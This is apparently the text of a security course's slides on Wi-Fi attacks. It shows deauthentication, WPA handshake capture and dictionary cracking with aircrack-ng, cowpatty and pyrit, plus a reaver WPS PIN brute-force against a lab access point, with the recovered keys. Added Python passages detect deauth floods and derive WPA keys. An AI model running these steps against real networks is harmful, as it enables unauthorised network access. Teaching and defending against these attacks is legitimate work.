08:49:22 Sending 64 directed DeAuth. STMAC: [00:26:5A:74:15:28] [ 0|63 ACKs]

wpa_supplicant -Dwext -iwlan4 -c/etc/wpa_supplicant/wpa.conf
Trying to associate with 00:1b:11:50:2f:2e (SSID='dlink' freq=2437 MHz)
Associated with 00:1b:11:50:2f:2e
WPA: Key negotiation completed with 00:1b:11:50:2f:2e [PTK=CCMP GTK=CCMP]
CTRL-EVENT-CONNECTED - Connection to 00:1b:11:50:2f:2e completed (auth) [id=1 id_str=]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys

aircrack-ng dlink-01.cap
Opening dlink-01.cap
Read 60093 packets.

# BSSID ESSID Encryption

1 00:1B:11:50:2F:2E dlink WPA (1 handshake)
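Added detection example, not from the course: the forced disconnection above appears on the air as a burst of deauthentication frames carrying the AP's address, which a monitor-mode sensor can flag with a sliding-window count per source. The capture lines are constructed in tcpdump's radiotap output format using the dlink AP address from these slides and a hypothetical client address (d4:be:d9:aa:bb:cc); 802.11w (Protected Management Frames) is the configuration fix, since it authenticates deauth/disassoc frames so a station ignores spoofed ones.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed capture in the format tcpdump uses for radiotap/monitor-mode captures:
# a burst of 64 deauthentication frames carrying the AP address from the dlink
# capture above (matching "Sending 64 directed DeAuth"), then one ordinary deauth
# from a hypothetical client (d4:be:d9:aa:bb:cc) that is simply leaving the network.
SAMPLE_CAPTURE = "\n".join(
    [f"08:49:22.{100000 + i * 8000:06d} 1.0 Mb/s 2437 MHz 11b -40dB signal antenna 1 "
     "DeAuthentication (00:1b:11:50:2f:2e): Class 3 frame received from nonassociated station"
     for i in range(64)]
    + ["08:49:25.000001 1.0 Mb/s 2437 MHz 11b -52dB signal antenna 1 "
       "DeAuthentication (d4:be:d9:aa:bb:cc): Deauthenticated because sending station is leaving"]
)

# timestamp at the start of the line, then the management frame type and its source address
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d{6}).*?"
    r"(?P<kind>DeAuthentication|Disassociation) \((?P<src>[0-9a-f:]{17})\)"
)


def detect_deauth_floods(text, window=timedelta(seconds=2), threshold=10):
    """Raise one alert per source address whose deauth/disassoc frames reach
    `threshold` inside a sliding `window`. A legitimate departure is a frame or
    two; tens of frames per second from the AP's own address is a spoofed flood."""
    recent = defaultdict(deque)          # src -> timestamps still inside the window
    alerted, alerts = set(), []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%H:%M:%S.%f")
        q = recent[m["src"]]
        q.append(ts)
        while ts - q[0] > window:        # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold and m["src"] not in alerted:
            alerted.add(m["src"])        # report the first crossing only
            alerts.append({"src": m["src"], "kind": m["kind"],
                           "first": q[0].strftime("%H:%M:%S.%f"),
                           "last": ts.strftime("%H:%M:%S.%f"), "count": len(q)})
    return alerts


if __name__ == "__main__":
    for a in detect_deauth_floods(SAMPLE_CAPTURE):
        print(f"ALERT {a['kind']} flood from {a['src']}: {a['count']} frames "
              f"between {a['first']} and {a['last']}")
```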


time aircrack-ng -w popular_ptBR.dic dlink-01.cap

Aircrack-ng 1.1

[00:01:09] 88192 keys tested (1274.66 k/s)


KEY FOUND! [ pxxxxxxxxxxxxxxxx ]
Master Key : E3 C5 0B 41 F1 8B 96 00 4B E1 AF F8 D9 67 0F 1F
D4 63 BA F0 0B 8A 2C 55 5F DD 5F 58 21 03 CE E4
Transient Key : 00 C8 D3 4D C1 7A 8B D5 57 3C FB 5B 86 D5 56 09
57 FA 29 9E 1E 2D A3 27 C1 19 07 4F 76 0C 25 57
A8 E8 F0 69 14 DE F7 18 FE EB 41 55 A4 17 87 CC
01 F9 F9 A4 87 95 C7 1C 90 BD 12 B4 CC 63 9A C3
EAPOL HMAC : 17 4A DB 11 5A AE 52 D6 CF E6 E4 2A 96 1D FB D2
real 1m9.538s
user 4m18.786s
sys 0m0.629s
Cowpatty

time genpmk -f 234k_pt-br_popular.dic -d dlink234.pmk -s dlink

109216 passphrases tested in 542.98 seconds: 201.14 passphrases/second

real 9m2.988s
user 9m2.468s
sys 0m0.414s

time pyrit -i popular.dic -o dlink.pmk -e dlink passthrough
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Computed 109216 PMKs total; 1865 PMKs per second

real 1m20.753s
user 5m2.437s
sys 0m0.753s

Cowpatty
cowpatty -d dlinkpop.pmk -s dlink -r dlink-01.cap

cowpatty 4.6 - WPA-PSK dictionary attack. <jwright@hasborg.com>

Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack. Please be patient.
key no. 10000: 22222222
key no. 20000: 93833104
key no. 30000: And48560
key no. 40000: Cib00043
key no. 50000: enqetm17
key no. 60000: hamdan00
key no. 70000: liberta10
key no. 80000: Mil08187

The PSK is "pxxxxxxxxxxxxxxxxxx".

89038 passphrases tested in 0.68 seconds: 130724.27 passphrases/second
Pyrit

time pyrit -r dlink-01.cap -i t-br_popular.dic attack_passthrough


Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'dlink-01.cap' (1/1)...


Parsed 19 packets (19 802.11-packets), got 1 AP(s)

Picked AccessPoint 00:1b:11:50:2f:2e ('dlink') automatically.


Tried 109216 PMKs so far; 1870 PMKs per second.

The password is 'pxxxxxxxxxxxxx'.

real 1m21.027s
user 5m5.224s
sys 0m0.724s
Pyrit
pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Running benchmark (1239.9 PMKs/s)... \

Computed 1239.93 PMKs/s total.


#1: 'CPU-Core (SSE2)': 331.4 PMKs/s (RTT 3.0)
#2: 'CPU-Core (SSE2)': 332.1 PMKs/s (RTT 3.1)
#3: 'CPU-Core (SSE2)': 331.7 PMKs/s (RTT 3.0)
#4: 'CPU-Core (SSE2)': 331.3 PMKs/s (RTT 3.1)
Pyrit
pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Running benchmark (1880.5 PMKs/s)... /

Computed 1880.52 PMKs/s total.

#1: 'CUDA-Device #1 'GeForce 320M'': 1588.4 PMKs/s (RTT 2.7)
#2: 'CPU-Core (SSE2)': 361.3 PMKs/s (RTT 2.9)
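Added example, not from the course, showing what genpmk, cowpatty and pyrit are computing: the WPA/WPA2 PMK is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, and the PTK (the "Transient Key" aircrack-ng prints) is derived from the PMK and the 4-way handshake values. The MAC addresses and nonces passed to wpa_ptk are constructed; the PMK test vector ("password"/"IEEE") is the one in the IEEE 802.11i standard.

```python
import hashlib
import hmac
import time


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key (IEEE 802.11i): PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32).
    The SSID is the salt, so a table such as dlink234.pmk only applies to networks
    named "dlink": a unique SSID defeats precomputed PMK tables, and the 4096
    iterations are what limit genpmk/pyrit to a few hundred PMKs per core per second."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated."""
    out = b""
    for counter in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
    return out[:nbytes]


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> dict:
    """Pairwise Transient Key from the PMK and the 4-way handshake values
    (AP address, station address, ANonce from msg 1/4, SNonce from msg 2/4).
    KCK keys the EAPOL MIC (the "EAPOL HMAC" line), KEK wraps the group key,
    TK encrypts data; aircrack-ng prints the whole 64-byte PTK as "Transient Key"."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, b"Pairwise key expansion", data, 64)
    return {"KCK": ptk[:16], "KEK": ptk[16:32], "TK": ptk[32:48], "PTK": ptk}


def pmk_rate(samples: int = 20) -> float:
    """Single-core PMKs per second for this interpreter, to compare with the
    201 (genpmk), 331 per core (pyrit CPU) and 1588 (CUDA) figures above."""
    start = time.perf_counter()
    for i in range(samples):
        wpa_pmk(f"constructed-passphrase-{i}", "dlink")   # constructed inputs
    return samples / (time.perf_counter() - start)


def seconds_to_exhaust(wordlist_size: int, pmks_per_second: float) -> float:
    """Time to try every entry of a wordlist: 109216 words at 201.14 PMK/s is the
    542.98 s genpmk reported above, which is why a PSK must not be a dictionary word."""
    return wordlist_size / pmks_per_second


if __name__ == "__main__":
    pmk = wpa_pmk("password", "IEEE")                     # 802.11i test-vector input
    print("PMK", pmk.hex())
    # hypothetical AP/station addresses (the dlink pair from these slides) and constructed nonces
    keys = wpa_ptk(pmk, bytes.fromhex("001b11502f2e"), bytes.fromhex("00265a741528"),
                   bytes(range(32)), bytes(range(32, 64)))
    print("KCK", keys["KCK"].hex())
    print(f"{pmk_rate():.0f} PMK/s on this core; "
          f"{seconds_to_exhaust(109216, 201.14):.2f} s for the 109216-word list at genpmk speed")
```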
Attack on WPS

WiFi Protected Setup

Recover configuration (PIN)
Reconfigure AP
Register (PIN)
# wash -i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------
48:5B:39:B0:2D:2C 3 -54 1.0 No LABVIRUS
# reaver -i mon0 -b 48:5B:39:B0:D0:2C -v

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 48:5B:39:B0:D0:2C
[+] Associated with 48:5B:39:B0:D0:2C (ESSID: LABVIRUS)
[+] Trying pin 12345670
[+] WPS PIN: '12345670'
[+] WPA PSK: 'labvirus2013'
[+] AP SSID: 'LABVIRUS'
Any doubts?

Questions?
Criticism?
Suggestions?
Follow Clavis

http://clav.is/slideshare

http://clav.is/twitter

http://clav.is/facebook
Thank you very much!

monitoria@clavis.com.br

academia@clavis.com.br

Nelson Murilo
Clavis Segurança da Informação
